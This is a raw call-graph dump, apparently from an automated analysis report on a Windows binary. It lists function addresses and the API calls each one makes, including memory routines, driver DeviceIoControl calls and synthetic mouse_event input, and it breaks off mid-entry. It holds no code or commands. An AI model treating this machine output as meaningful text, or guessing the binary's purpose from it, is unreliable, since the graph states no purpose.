20730 7ff68b493400 20619->20730 20621 7ff68b4a10c0 3 API calls 20620->20621 20621->20619 20624 7ff68b49ee6a malloc memcpy 20622->20624 20625 7ff68b49ee86 20622->20625 20624->20625 20627 7ff68b49eeae 20625->20627 20628 7ff68b49eea8 free 20625->20628 20626 7ff68b49eecf 20634 7ff68b49eef0 20626->20634 20627->20626 20631 7ff68b49eec9 free 20627->20631 20628->20627 20629->20622 20630 7ff68b49ed6e memcpy 20629->20630 20632 7ff68b49ed8a 20630->20632 20633 7ff68b49ed9c free 20630->20633 20631->20626 20632->20633 20633->20622 20635 7ff68b49efda 20634->20635 20737 7ff68b49f760 20635->20737 20637 7ff68b49f040 20638 7ff68b49f360 20637->20638 20639 7ff68b49f391 20638->20639 20640 7ff68b49ec70 14 API calls 20639->20640 20641 7ff68b49f49e 20640->20641 20641->20394 20659 7ff68b482050 20642->20659 20644 7ff68b481489 20663 7ff68b481130 20644->20663 20650 7ff68b4819cb memset memset 20650->20573 20653 7ff68b493835 malloc 20652->20653 20654 7ff68b49389a 20652->20654 20653->20654 20656 7ff68b493866 memcpy 20653->20656 20654->20575 20657 7ff68b493882 20656->20657 20658 7ff68b493894 free 20656->20658 20657->20658 20658->20654 20660 7ff68b4cbee7 20659->20660 20661 7ff68b4820f4 memset 20660->20661 20662 7ff68b482370 20661->20662 20662->20644 20662->20662 20664 7ff68b4811bc 20663->20664 20665 7ff68b4811a3 20663->20665 20667 7ff68b4811e4 20664->20667 20685 7ff68b4938c0 20664->20685 20666 7ff68b493820 3 API calls 20665->20666 20666->20664 20692 7ff68b4a2cd0 20667->20692 20670 7ff68b4811f3 20673 7ff68b481227 20670->20673 20701 7ff68b4a2dc0 20670->20701 20672 7ff68b48124c 20675 7ff68b481270 memset 20672->20675 20676 7ff68b493280 3 API calls 20672->20676 20673->20672 20708 7ff68b493280 20673->20708 20677 7ff68b4a10c0 20675->20677 20676->20675 20678 7ff68b4a10da free 20677->20678 20680 7ff68b4a10fa 20677->20680 20678->20680 20681 7ff68b4a1119 free 20680->20681 20683 7ff68b4a1123 20680->20683 20681->20683 20682 7ff68b481928 malloc 20682->20650 20683->20682 20684 7ff68b4a1142 free 20683->20684 20684->20682 20686 7ff68b493933 20685->20686 20687 7ff68b4938d5 malloc 20685->20687 20686->20667 20687->20686 20689 7ff68b493904 memcpy 20687->20689 20690 7ff68b49391b 20689->20690 20691 7ff68b49392d free 20689->20691 20690->20691 20691->20686 20693 7ff68b4a2daa 20692->20693 20695 7ff68b4a2cea 20692->20695 20693->20670 20694 7ff68b4a2d98 20694->20670 20695->20694 20696 7ff68b4a2d29 malloc 20695->20696 20697 7ff68b4a2d46 memcpy 20696->20697 20698 7ff68b4a2d7a 20696->20698 20699 7ff68b4a2d62 20697->20699 20700 7ff68b4a2d74 free 20697->20700 20698->20670 20699->20700 20700->20698 20702 7ff68b4a2e35 20701->20702 20703 7ff68b4a2dd5 malloc 20701->20703 20702->20673 20703->20702 20705 7ff68b4a2e05 memcpy 20703->20705 20706 7ff68b4a2e2f free 20705->20706 20707 7ff68b4a2e1d 20705->20707 20706->20702 20707->20706 20709 7ff68b4932f5 20708->20709 20710 7ff68b493295 malloc 20708->20710 20709->20672 20710->20709 20712 7ff68b4932c5 memcpy 20710->20712 20713 7ff68b4932ef free 20712->20713 20714 7ff68b4932dd 20712->20714 20713->20709 20714->20713 20716 7ff68b482687 20715->20716 20718 7ff68b48272b malloc 20716->20718 20719 7ff68b48273a 20716->20719 20717 7ff68b4827d6 _wfopen 20720 7ff68b48280f 20717->20720 20721 7ff68b4827ee free 20717->20721 20718->20719 20719->20717 20723 7ff68b4ca930 8 API calls 20720->20723 20721->20720 20724 7ff68b48281c 20723->20724 20724->20585 20724->20586 20729 7ff68b4813d0 20725->20729 20727 7ff68b482495 __stdio_common_vsprintf 20728 7ff68b4824ca 20727->20728 20728->20599 20729->20727 20731 7ff68b493423 20730->20731 20733 7ff68b4934a2 20730->20733 20732 7ff68b493459 malloc 20731->20732 20731->20733 20732->20733 20734 7ff68b493472 memcpy 20732->20734 20733->20617 20735 7ff68b49348a 20734->20735 20736 7ff68b49349c free 20734->20736 20735->20736 20736->20733 20738 7ff68b49f790 20737->20738 20738->20738 20739 7ff68b49f7c4 malloc 20738->20739 20740 7ff68b49f7dd 20739->20740 20744 7ff68b49f4c0 20740->20744 20745 7ff68b49f522 20744->20745 20746 7ff68b49f528 malloc 20744->20746 20745->20746 20747 7ff68b49f5f9 20746->20747 20748 7ff68b49f55d 20746->20748 20750 7ff68b49ec70 14 API calls 20747->20750 20748->20747 20749 7ff68b4a2540 3 API calls 20748->20749 20752 7ff68b49f5da 20749->20752 20751 7ff68b49f733 free 20750->20751 20751->20637 20752->20747 20753 7ff68b4a2540 3 API calls 20752->20753 20753->20752 20755 7ff68b4a378f 20754->20755 20761 7ff68b4a37ec 20754->20761 20756 7ff68b4a37ac 20755->20756 20757 7ff68b4a37a4 20755->20757 20758 7ff68b49eef0 20 API calls 20755->20758 20760 7ff68b4a37d4 malloc 20756->20760 20756->20761 21405 7ff68b49f8f0 20757->21405 20758->20757 20760->20761 20764 7ff68b4a38c3 20761->20764 20765 7ff68b4a38a0 memcpy 20761->20765 20762 7ff68b4ca930 8 API calls 20763 7ff68b4a38f6 20762->20763 20763->20404 20764->20762 20765->20764 20765->20765 20767 7ff68b4a3921 20766->20767 20768 7ff68b4a3928 20766->20768 20767->20413 20769 7ff68b4a3a32 SetCursor 20768->20769 20770 7ff68b4a3945 LoadCursorA SetCursor 20768->20770 20769->20413 20770->20413 20773 7ff68b4bddf0 20772->20773 20774 7ff68b4bddfd 20772->20774 21647 7ff68b4b2e10 20773->21647 20775 7ff68b4ca930 8 API calls 20774->20775 20777 7ff68b4be7dd 20775->20777 20777->20412 20778 7ff68b4bddf5 20778->20774 21655 7ff68b4c8150 20778->21655 20780 7ff68b4bde21 21663 7ff68b4c8050 20780->21663 20782 7ff68b4bde36 21671 7ff68b4c8320 20782->21671 20785 7ff68b4c8320 9 API calls 20786 7ff68b4bde5e 20785->20786 20787 7ff68b4b27c0 48 API calls 20786->20787 20788 7ff68b4bdf4c 20787->20788 21677 7ff68b4b2330 20788->21677 20790 7ff68b4bdf59 21685 7ff68b4c8240 20790->21685 20840 7ff68b4be8c0 9 API calls 20839->20840 20841 7ff68b4b281b 20840->20841 20842 7ff68b4c8050 9 API calls 20841->20842 20843 7ff68b4b2828 20842->20843 20844 7ff68b4c8050 9 API calls 20843->20844 20845 7ff68b4b2837 20844->20845 20846 7ff68b4c8050 9 API calls 20845->20846 20847 7ff68b4b2846 20846->20847 20848 7ff68b4c8050 9 API calls 20847->20848 20849 7ff68b4b2852 20848->20849 20850 7ff68b4b28c2 20849->20850 20851 7ff68b4b285a 20849->20851 20853 7ff68b4c8050 9 API calls 20850->20853 20852 7ff68b4be8c0 9 API calls 20851->20852 20855 7ff68b4b287a 20852->20855 20854 7ff68b4b28cb 20853->20854 20856 7ff68b4c8150 9 API calls 20854->20856 20857 7ff68b4b28bd 20855->20857 20858 7ff68b4b28b8 20855->20858 20860 7ff68b4b28b1 _invalid_parameter_noinfo_noreturn 20855->20860 20863 7ff68b4b28d7 20856->20863 20859 7ff68b4ca930 8 API calls 20857->20859 20861 7ff68b4cad80 free 20858->20861 20862 7ff68b4b2ced 20859->20862 20860->20858 20861->20857 20862->20413 20863->20857 20864 7ff68b4b2906 DeviceIoControl 20863->20864 21731 7ff68b4c7690 20864->21731 20867 7ff68b4b2c01 20868 7ff68b4c8670 7 API calls 20867->20868 20869 7ff68b4b2c29 20868->20869 20871 7ff68b4c7e40 13 API calls 20869->20871 20873 7ff68b4b2c44 20871->20873 20872 7ff68b4b29c8 21769 7ff68b4c8670 20872->21769 20875 7ff68b4b2c83 20873->20875 20879 7ff68b4b2c7e 20873->20879 20883 7ff68b4b2c77 _invalid_parameter_noinfo_noreturn 20873->20883 20878 7ff68b4cad80 free 20875->20878 20882 7ff68b4b2c8b 20878->20882 20880 7ff68b4cad80 free 20879->20880 20880->20875 20881 7ff68b4b2a08 21790 7ff68b4c9a40 20881->21790 20882->20857 20886 7ff68b4b2cca 20882->20886 20888 7ff68b4b2cc3 _invalid_parameter_noinfo_noreturn 20882->20888 20883->20879 20888->20886 20911 7ff68b4bed56 20910->20911 20912 7ff68b4befdd 20910->20912 21841 7ff68b4ca9f8 AcquireSRWLockExclusive 20911->21841 20913 7ff68b4c8050 9 API calls 20912->20913 20920 7ff68b4befe9 20913->20920 20918 7ff68b4bf313 20923 7ff68b4ca930 8 API calls 20918->20923 20927 7ff68b4b1b70 9 API calls 20920->20927 20931 7ff68b4bf053 20920->20931 20921 7ff68b4bf30e 20929 7ff68b4cad80 free 20921->20929 20922 7ff68b4bf0c0 20922->20918 20922->20921 20928 7ff68b4bf307 _invalid_parameter_noinfo_noreturn 20922->20928 20924 7ff68b4bf322 20923->20924 20924->20413 20927->20931 20928->20921 20929->20918 20931->20922 20932 7ff68b4bf0c5 20931->20932 21846 7ff68b4c91c0 20931->21846 20934 7ff68b4c8050 9 API calls 20932->20934 20939 7ff68b4bf0d1 20934->20939 20939->20922 20943 7ff68b4bf13d 20939->20943 20947 7ff68b4b1b70 9 API calls 20939->20947 20941 7ff68b4bf19a pow pow pow 20944 7ff68b4bf204 sqrt 20941->20944 20945 7ff68b4bf1fb 20941->20945 20943->20941 20953 7ff68b4b1b70 9 API calls 20943->20953 20944->20945 20950 7ff68b4bf251 20945->20950 20954 7ff68b4ca9f8 3 API calls 20945->20954 20947->20943 20952 7ff68b4b2230 2 API calls 20950->20952 20956 7ff68b4bf25b 20952->20956 20957 7ff68b4bf191 20953->20957 20958 7ff68b4bf230 20954->20958 20956->20922 20961 7ff68b4bf295 mouse_event mouse_event 20956->20961 20957->20941 20958->20950 20962 7ff68b4b2230 2 API calls 20958->20962 20961->20922 20963 7ff68b4bf245 20962->20963 21853 7ff68b4ca98c AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 20963->21853 20974 7ff68b4bb32d 20973->20974 21854 7ff68b48cac0 20974->21854 21248 7ff68b4873f5 21247->21248 21249 7ff68b48708f 21247->21249 21248->20413 21250 7ff68b48c6f0 41 API calls 21249->21250 21251 7ff68b48711c 21250->21251 21254 7ff68b48712b 21251->21254 22847 7ff68b4915e0 21251->22847 21253 7ff68b4873b7 21255 7ff68b4873dd 21253->21255 21256 7ff68b493280 3 API calls 21253->21256 21259 7ff68b4871b2 21254->21259 21260 7ff68b487181 21254->21260 22855 7ff68b491e80 21254->22855 21257 7ff68b493280 3 API calls 21255->21257 21256->21255 21257->21248 21259->21253 21264 7ff68b487219 21259->21264 22868 7ff68b4852a0 21259->22868 21260->21259 22858 7ff68b48d7f0 21260->22858 21264->21253 22871 7ff68b48da30 21264->22871 21266 7ff68b487568 21265->21266 21267 7ff68b487563 21265->21267 21278 7ff68b4875a6 21266->21278 22895 7ff68b493310 21266->22895 21268 7ff68b487070 62 API calls 21267->21268 21268->21266 21270 7ff68b4876e1 21271 7ff68b493310 3 API calls 21270->21271 21274 7ff68b4876f5 21271->21274 21272 7ff68b48765f 21273 7ff68b4876a0 21272->21273 21277 7ff68b486e80 3 API calls 21272->21277 21273->21270 21281 7ff68b486e80 3 API calls 21273->21281 21275 7ff68b487724 21274->21275 21276 7ff68b4876fe memcpy 21274->21276 21284 7ff68b487754 21275->21284 22910 7ff68b4a2100 21275->22910 21279 7ff68b493310 3 API calls 21276->21279 21277->21273 21278->21272 22904 7ff68b486e80 21278->22904 21279->21275 21281->21270 21283 7ff68b4877c7 21285 7ff68b4ca930 8 API calls 21283->21285 21284->21283 21287 7ff68b493280 3 API calls 21284->21287 21286 7ff68b4878c4 21285->21286 21286->20413 21287->21283 21289 7ff68b4a3168 21288->21289 21293 7ff68b4a2e84 21288->21293 21290 7ff68b4ca930 8 API calls 21289->21290 21291 7ff68b4a3743 21290->21291 21291->20413 21292 7ff68b4a3131 memcpy 21292->21289 21292->21293 21293->21289 21293->21292 21295 7ff68b48681e 21294->21295 21298 7ff68b486856 21294->21298 21295->21298 22932 7ff68b49e9b0 21295->22932 21296 7ff68b486d41 21296->20427 21349 7ff68b493b00 21296->21349 21297 7ff68b48688d 21299 7ff68b4868ce 21297->21299 22960 7ff68b493950 21297->22960 21298->21296 21298->21297 22950 7ff68b4925d0 21298->22950 21302 7ff68b486900 21299->21302 21305 7ff68b4868f3 free 21299->21305 21307 7ff68b486932 21302->21307 21309 7ff68b486925 free 21302->21309 21305->21302 21308 7ff68b486964 21307->21308 21310 7ff68b486957 free 21307->21310 21311 7ff68b48699d 21308->21311 21312 7ff68b486990 free 21308->21312 21309->21307 21310->21308 21313 7ff68b4869cf 21311->21313 21314 7ff68b4869c2 free 21311->21314 21312->21311 21315 7ff68b486a2b 21313->21315 21317 7ff68b486a1e free 21313->21317 21314->21313 21316 7ff68b486a5d 21315->21316 21318 7ff68b486a50 free 21315->21318 21319 7ff68b486a8f 21316->21319 21320 7ff68b486a82 free 21316->21320 21317->21315 21318->21316 21321 7ff68b486ac1 21319->21321 21322 7ff68b486ab4 free 21319->21322 21320->21319 21323 7ff68b486af3 21321->21323 21325 7ff68b486ae6 free 21321->21325 21322->21321 21324 7ff68b486b25 21323->21324 21326 7ff68b486b18 free 21323->21326 21327 7ff68b486b57 21324->21327 21328 7ff68b486b4a free 21324->21328 21325->21323 21326->21324 22978 7ff68b49ba00 21327->22978 21328->21327 21331 7ff68b486b95 21332 7ff68b486bc7 21331->21332 21334 7ff68b486bba free 21331->21334 21335 7ff68b486bf9 21332->21335 21336 7ff68b486bec free 21332->21336 21333 7ff68b486b88 free 21333->21331 21334->21332 21337 7ff68b486c1e free 21335->21337 21342 7ff68b486c2b 21335->21342 21336->21335 21337->21342 21338 7ff68b486c76 21342->21338 21346 7ff68b486c62 free 21342->21346 21346->21342 21350 7ff68b493b32 21349->21350 21351 7ff68b493b19 free 21349->21351 21353 7ff68b493b57 21350->21353 21354 7ff68b493b50 free 21350->21354 21351->21350 21355 7ff68b493b7c 21353->21355 21356 7ff68b493b75 free 21353->21356 21354->21353 21357 7ff68b493ba1 21355->21357 21358 7ff68b493b9a free 21355->21358 21356->21355 21359 7ff68b493bc6 21357->21359 21360 7ff68b493bbf free 21357->21360 21358->21357 21361 7ff68b4a10c0 3 API calls 21359->21361 21360->21359 21362 7ff68b493bd2 21361->21362 21363 7ff68b493bf8 21362->21363 21364 7ff68b493bf1 free 21362->21364 21365 7ff68b493c1d 21363->21365 21366 7ff68b493c16 free 21363->21366 21364->21363 21367 7ff68b493c42 21365->21367 21368 7ff68b493c3b free 21365->21368 21366->21365 23043 7ff68b481d40 21367->23043 21368->21367 21371 7ff68b493c74 21373 7ff68b493c99 21371->21373 21374 7ff68b493c92 free 21371->21374 21372 7ff68b493c6d free 21372->21371 23051 7ff68b493720 21373->23051 21374->21373 21377 7ff68b493ccb 21379 7ff68b493cf0 21377->21379 21381 7ff68b493ce9 free 21377->21381 21378 7ff68b493cc4 free 21378->21377 21380 7ff68b493d15 21379->21380 21382 7ff68b493d0e free 21379->21382 21383 7ff68b4812a0 16 API calls 21380->21383 21381->21379 21382->21380 21385 7ff68b493d21 21383->21385 21384 7ff68b493d91 21385->21384 21386 7ff68b493d8a free 21385->21386 21386->21384 21406 7ff68b49f946 21405->21406 21407 7ff68b49f981 21405->21407 21460 7ff68b4a2bf0 21406->21460 21408 7ff68b49f9bc 21407->21408 21410 7ff68b49f9b6 free 21407->21410 21411 7ff68b49f9d7 free 21408->21411 21415 7ff68b49f9dd malloc 21408->21415 21410->21408 21411->21415 21413 7ff68b49fad0 21414 7ff68b49fad6 malloc 21413->21414 21417 7ff68b49faf3 21414->21417 21432 7ff68b4a010f 21414->21432 21415->21413 21415->21414 21416 7ff68b4a09c0 21419 7ff68b4ca930 8 API calls 21416->21419 21417->21432 21467 7ff68b4a0a40 21417->21467 21418 7ff68b4a09f5 free 21418->21416 21421 7ff68b4a0a0c 21419->21421 21421->20756 21424 7ff68b49fbed malloc 21426 7ff68b49fc3e 21424->21426 21427 7ff68b49fc44 malloc 21424->21427 21426->21427 21428 7ff68b49fc61 21427->21428 21429 7ff68b49fc67 malloc memset memset memset 21427->21429 21428->21429 21433 7ff68b4a013b malloc memset 21429->21433 21450 7ff68b49fcc1 21429->21450 21430 7ff68b49fb95 21430->21424 21430->21432 21478 7ff68b494fc0 21430->21478 21432->21416 21432->21418 21435 7ff68b4a0393 free 21433->21435 21454 7ff68b4a0200 21433->21454 21438 7ff68b4a03c5 21435->21438 21439 7ff68b4a03d7 free 21435->21439 21438->21439 21441 7ff68b4a03e9 21439->21441 21442 7ff68b4a03fb free 21439->21442 21441->21442 21444 7ff68b4a07eb free 21442->21444 21458 7ff68b4a0429 21442->21458 21446 7ff68b4a0842 21444->21446 21447 7ff68b4a0854 free 21444->21447 21446->21447 21448 7ff68b4a0863 21447->21448 21449 7ff68b4a0875 free 21447->21449 21448->21449 21453 7ff68b4a0883 21449->21453 21450->21433 21484 7ff68b49a590 21450->21484 21488 7ff68b4944b0 21450->21488 21452 7ff68b4a10c0 3 API calls 21452->21458 21455 7ff68b4a0979 21453->21455 21456 7ff68b4a1530 3 API calls 21453->21456 21454->21435 21495 7ff68b49a800 21454->21495 21455->21416 21457 7ff68b4a1180 11 API calls 21455->21457 21456->21453 21457->21455 21458->21444 21458->21452 21509 7ff68b4a1180 21458->21509 21519 7ff68b4a1530 21458->21519 21461 7ff68b4a2c12 21460->21461 21463 7ff68b4a2c91 21460->21463 21462 7ff68b4a2c48 malloc 21461->21462 21461->21463 21462->21463 21464 7ff68b4a2c61 memcpy 21462->21464 21463->21407 21465 7ff68b4a2c79 21464->21465 21466 7ff68b4a2c8b free 21464->21466 21465->21466 21466->21463 21468 7ff68b4a0a72 21467->21468 21469 7ff68b4a0aa4 memset 21467->21469 21468->21469 21470 7ff68b4a0a94 malloc 21468->21470 21471 7ff68b4a0abe 21469->21471 21470->21469 21471->21471 21472 7ff68b4944b0 3 API calls 21471->21472 21474 7ff68b4a0b0c 21472->21474 21473 7ff68b4a0b78 21476 7ff68b4ca930 8 API calls 21473->21476 21474->21473 21475 7ff68b4a0b6e free 21474->21475 21475->21473 21477 7ff68b49fb5c malloc 21476->21477 21477->21424 21477->21430 21481 7ff68b495031 21478->21481 21479 7ff68b4ca930 8 API calls 21480 7ff68b495468 21479->21480 21480->21430 21483 7ff68b4952b0 21481->21483 21522 7ff68b494e50 21481->21522 21483->21479 21485 7ff68b49a7ac 21484->21485 21486 7ff68b49a5be 21484->21486 21485->21450 21486->21485 21526 7ff68b4981f0 21486->21526 21489 7ff68b4944ef qsort 21488->21489 21490 7ff68b4944dd 21488->21490 21491 7ff68b4946d7 qsort 21489->21491 21494 7ff68b494514 21489->21494 21490->21489 21491->21450 21492 7ff68b494666 qsort 21493 7ff68b494690 21492->21493 21493->21450 21494->21492 21496 7ff68b49ae5d 21495->21496 21499 7ff68b49a85e 21495->21499 21497 7ff68b4ca930 8 API calls 21496->21497 21498 7ff68b49aef1 21497->21498 21498->21454 21499->21496 21500 7ff68b4981f0 12 API calls 21499->21500 21502 7ff68b49acc7 free 21499->21502 21507 7ff68b49ac88 free 21499->21507 21508 7ff68b49aca3 free 21499->21508 21538 7ff68b4980f0 21499->21538 21546 7ff68b499c40 21499->21546 21558 7ff68b499250 21499->21558 21566 7ff68b49a040 21499->21566 21572 7ff68b49a2f0 21499->21572 21500->21499 21502->21499 21507->21499 21507->21508 21508->21499 21510 7ff68b4a11aa 21509->21510 21511 7ff68b4a11f1 21510->21511 21512 7ff68b4a11e3 free 21510->21512 21513 7ff68b4a121e 21511->21513 21514 7ff68b4a1214 free 21511->21514 21512->21511 21625 7ff68b4a1450 21513->21625 21514->21513 21518 7ff68b4a12d8 21518->21458 21520 7ff68b4a2b00 3 API calls 21519->21520 21521 7ff68b4a1563 21520->21521 21521->21458 21525 7ff68b494e9a 21522->21525 21523 7ff68b4ca930 8 API calls 21524 7ff68b494f9f 21523->21524 21524->21483 21525->21523 21527 7ff68b498255 21526->21527 21528 7ff68b498336 floorf 21527->21528 21529 7ff68b498358 21527->21529 21534 7ff68b4983ce 21527->21534 21528->21529 21530 7ff68b498385 21529->21530 21531 7ff68b498366 floorf 21529->21531 21532 7ff68b4983ab 21530->21532 21533 7ff68b49838a ceilf 21530->21533 21531->21530 21532->21534 21535 7ff68b4983b0 ceilf 21532->21535 21533->21532 21536 7ff68b4ca930 8 API calls 21534->21536 21535->21534 21537 7ff68b4983e3 21536->21537 21537->21486 21539 7ff68b49811b 21538->21539 21542 7ff68b498125 21538->21542 21578 7ff68b495df0 21539->21578 21541 7ff68b498192 malloc 21543 7ff68b498120 21541->21543 21542->21541 21542->21543 21544 7ff68b4ca930 8 API calls 21543->21544 21545 7ff68b4981dc 21544->21545 21545->21499 21547 7ff68b499cae 21546->21547 21548 7ff68b499cf3 malloc 21547->21548 21550 7ff68b499d09 21547->21550 21548->21550 21552 7ff68b499d14 21548->21552 21549 7ff68b4ca930 8 API calls 21551 7ff68b499fdc 21549->21551 21550->21549 21551->21499 21552->21550 21553 7ff68b499d67 malloc 21552->21553 21598 7ff68b4997a0 21552->21598 21553->21552 21554 7ff68b499ffc free 21553->21554 21555 7ff68b49a00e 21554->21555 21556 7ff68b49a020 free 21554->21556 21555->21556 21556->21550 21560 7ff68b49928e malloc 21558->21560 21561 7ff68b499598 21560->21561 21564 7ff68b499364 21560->21564 21561->21499 21612 7ff68b498ba0 21564->21612 21567 7ff68b49a049 21566->21567 21571 7ff68b49a2df 21566->21571 21568 7ff68b49a0a0 memset 21567->21568 21569 7ff68b49a2c3 21567->21569 21568->21567 21570 7ff68b4ca930 8 API calls 21569->21570 21570->21571 21571->21499 21576 7ff68b49a579 21572->21576 21577 7ff68b49a2f8 21572->21577 21573 7ff68b49a340 memset 21573->21577 21574 7ff68b49a562 21575 7ff68b4ca930 8 API calls 21574->21575 21575->21576 21576->21499 21577->21573 21577->21574 21577->21577 21579 7ff68b495e7d 21578->21579 21580 7ff68b495eb2 malloc 21579->21580 21592 7ff68b495f41 21579->21592 21596 7ff68b4962a8 21579->21596 21580->21592 21581 7ff68b4ca930 8 API calls 21583 7ff68b496a94 21581->21583 21583->21543 21584 7ff68b4964c4 sqrtf 21584->21596 21585 7ff68b4964f7 sqrtf 21585->21596 21586 7ff68b4980f0 9 API calls 21586->21596 21587 7ff68b49698f malloc 21588 7ff68b496a3d 21587->21588 21587->21596 21589 7ff68b496a5d 21588->21589 21593 7ff68b496a54 free 21588->21593 21589->21592 21597 7ff68b496a7c free 21589->21597 21590 7ff68b4969b0 memcpy 21591 7ff68b4969c2 memcpy 21590->21591 21591->21596 21592->21581 21593->21589 21594 7ff68b4969f4 free 21594->21596 21595 7ff68b496a1f free 21595->21596 21596->21584 21596->21585 21596->21586 21596->21587 21596->21590 21596->21591 21596->21592 21596->21594 21596->21595 21597->21592 21599 7ff68b49988f sqrtf 21598->21599 21600 7ff68b499886 21598->21600 21599->21600 21601 7ff68b4998b2 21600->21601 21602 7ff68b4998bc sqrtf 21600->21602 21603 7ff68b4998e1 21601->21603 21604 7ff68b4998eb sqrtf 21601->21604 21602->21601 21605 7ff68b499917 sqrtf 21603->21605 21609 7ff68b49990e 21603->21609 21604->21603 21605->21609 21606 7ff68b499bc3 21606->21552 21607 7ff68b499b15 sqrtf 21607->21609 21608 7ff68b499b42 sqrtf 21608->21609 21609->21606 21609->21607 21609->21608 21610 7ff68b499b71 sqrtf 21609->21610 21611 7ff68b499b9d sqrtf 21609->21611 21610->21609 21611->21609 21613 7ff68b498c05 malloc 21612->21613 21623 7ff68b498c30 21612->21623 21613->21623 21615 7ff68b498cf5 memset memset 21615->21623 21616 7ff68b498f6f 21618 7ff68b499005 free 21616->21618 21621 7ff68b499016 21616->21621 21617 7ff68b499050 21620 7ff68b4ca930 8 API calls 21617->21620 21618->21616 21618->21621 21619 7ff68b499047 free 21619->21617 21622 7ff68b499060 free 21620->21622 21621->21617 21621->21619 21622->21561 21623->21615 21623->21616 21624 7ff68b498dc6 malloc 21623->21624 21624->21623 21626 7ff68b4a1466 21625->21626 21628 7ff68b4a122e 21625->21628 21627 7ff68b4a14ad 21626->21627 21640 7ff68b493690 21626->21640 21627->21628 21630 7ff68b4938c0 3 API calls 21627->21630 21628->21518 21631 7ff68b4a2b00 21628->21631 21630->21628 21632 7ff68b4a2bda 21631->21632 21633 7ff68b4a2b1a 21631->21633 21632->21518 21634 7ff68b4a2bc8 21633->21634 21635 7ff68b4a2b59 malloc 21633->21635 21634->21518 21636 7ff68b4a2b76 memcpy 21635->21636 21641 7ff68b4936a5 malloc 21640->21641 21643 7ff68b493705 21640->21643 21641->21643 21644 7ff68b4936d5 memcpy 21641->21644 21643->21627 21648 7ff68b4b2eed 21647->21648 21649 7ff68b4b2e3d 21647->21649 21650 7ff68b4ca930 8 API calls 21648->21650 21649->21648 21652 7ff68b4b2e70 DeviceIoControl 21649->21652 21651 7ff68b4b2efd 21650->21651 21651->20778 21653 7ff68b4ca930 8 API calls 21652->21653 21654 7ff68b4b2ee5 21653->21654 21654->20778 21656 7ff68b4c8228 21655->21656 21657 7ff68b4c8179 21655->21657 21658 7ff68b4ca930 8 API calls 21656->21658 21657->21656 21660 7ff68b4c81ac DeviceIoControl 21657->21660 21659 7ff68b4c8238 21658->21659 21659->20780 21661 7ff68b4ca930 8 API calls 21660->21661 21662 7ff68b4c8220 21661->21662 21662->20780 21664 7ff68b4c8129 21663->21664 21665 7ff68b4c8079 21663->21665 21666 7ff68b4ca930 8 API calls 21664->21666 21665->21664 21668 7ff68b4c80ac DeviceIoControl 21665->21668 21667 7ff68b4c8139 21666->21667 21667->20782 21669 7ff68b4ca930 8 API calls 21668->21669 21670 7ff68b4c8121 21669->21670 21670->20782 21672 7ff68b4c8422 21671->21672 21673 7ff68b4c837d 21671->21673 21674 7ff68b4ca930 8 API calls 21672->21674 21673->21672 21676 7ff68b4c83b0 DeviceIoControl 21673->21676 21675 7ff68b4bde4b 21674->21675 21675->20785 21676->21672 21678 7ff68b4b240d 21677->21678 21679 7ff68b4b235d 21677->21679 21680 7ff68b4ca930 8 API calls 21678->21680 21679->21678 21682 7ff68b4b2390 DeviceIoControl 21679->21682 21681 7ff68b4b241d 21680->21681 21681->20790 21683 7ff68b4ca930 8 API calls 21682->21683 21684 7ff68b4b2405 21683->21684 21684->20790 21732 7ff68b4c76c0 21731->21732 21732->21732 21733 7ff68b4c77c4 21732->21733 21734 7ff68b4c76dd 21732->21734 21816 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21733->21816 21735 7ff68b4c76e8 memcpy 21734->21735 21740 7ff68b4c7709 21734->21740 21737 7ff68b4b2975 21735->21737 21737->20867 21750 7ff68b4c9c30 21737->21750 21738 7ff68b4c77c9 21741 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 21738->21741 21739 7ff68b4c7787 21743 7ff68b4caf74 std::_Facet_Register 4 API calls 21739->21743 21740->21738 21740->21739 21744 7ff68b4c7739 21740->21744 21749 7ff68b4c7746 memcpy 21740->21749 21745 7ff68b4c77cf 21741->21745 21743->21749 21746 7ff68b4caf74 std::_Facet_Register 4 API calls 21744->21746 21747 7ff68b4c7741 21746->21747 21748 7ff68b4c7780 _invalid_parameter_noinfo_noreturn 21747->21748 21747->21749 21748->21739 21749->21737 21751 7ff68b4c9c72 21750->21751 21752 7ff68b4c9c59 21750->21752 21753 7ff68b4c9d4f 21751->21753 21754 7ff68b4c9c88 21751->21754 21752->20872 21817 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21753->21817 21755 7ff68b4c9cb4 21754->21755 21756 7ff68b4c9c8e memcpy 21754->21756 21758 7ff68b4c9d54 21755->21758 21759 7ff68b4c9d24 memcpy 21755->21759 21762 7ff68b4c9d1c 21755->21762 21766 7ff68b4c9cc0 21755->21766 21756->20872 21761 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 21758->21761 21759->20872 21760 7ff68b4caf74 std::_Facet_Register 4 API calls 21764 7ff68b4c9cd6 21760->21764 21765 7ff68b4c9d5a 21761->21765 21763 7ff68b4caf74 std::_Facet_Register 4 API calls 21762->21763 21767 7ff68b4c9cdb 21763->21767 21764->21767 21768 7ff68b4c9d15 _invalid_parameter_noinfo_noreturn 21764->21768 21766->21760 21767->21759 21768->21762 21770 7ff68b4c86ae 21769->21770 21771 7ff68b4b29f2 21769->21771 21772 7ff68b4c8793 21770->21772 21773 7ff68b4c86c7 21770->21773 21784 7ff68b4c7e40 21771->21784 21818 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 21772->21818 21773->21771 21775 7ff68b4c8798 21773->21775 21777 7ff68b4c8737 21773->21777 21781 7ff68b4c86d8 21773->21781 21778 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 21775->21778 21776 7ff68b4caf74 std::_Facet_Register 4 API calls 21780 7ff68b4c86f1 21776->21780 21779 7ff68b4caf74 std::_Facet_Register 4 API calls 21777->21779 21782 7ff68b4c879e 21778->21782 21779->21771 21780->21771 21781->21776 21785 7ff68b4c7e63 memcpy 21784->21785 21786 7ff68b4c7ea2 21784->21786 21785->20881 21819 7ff68b4c9890 21786->21819 21816->21738 21817->21758 21818->21775 21820 7ff68b4c9a09 21819->21820 21824 7ff68b4c98c8 21819->21824 21821 7ff68b4c992d 21824->21821 21826 7ff68b4c9920 21824->21826 21827 7ff68b4c9958 21824->21827 21828 7ff68b4c9913 21824->21828 21826->21821 21842 7ff68b4caa0e 21841->21842 21843 7ff68b4caa13 ReleaseSRWLockExclusive 21842->21843 21845 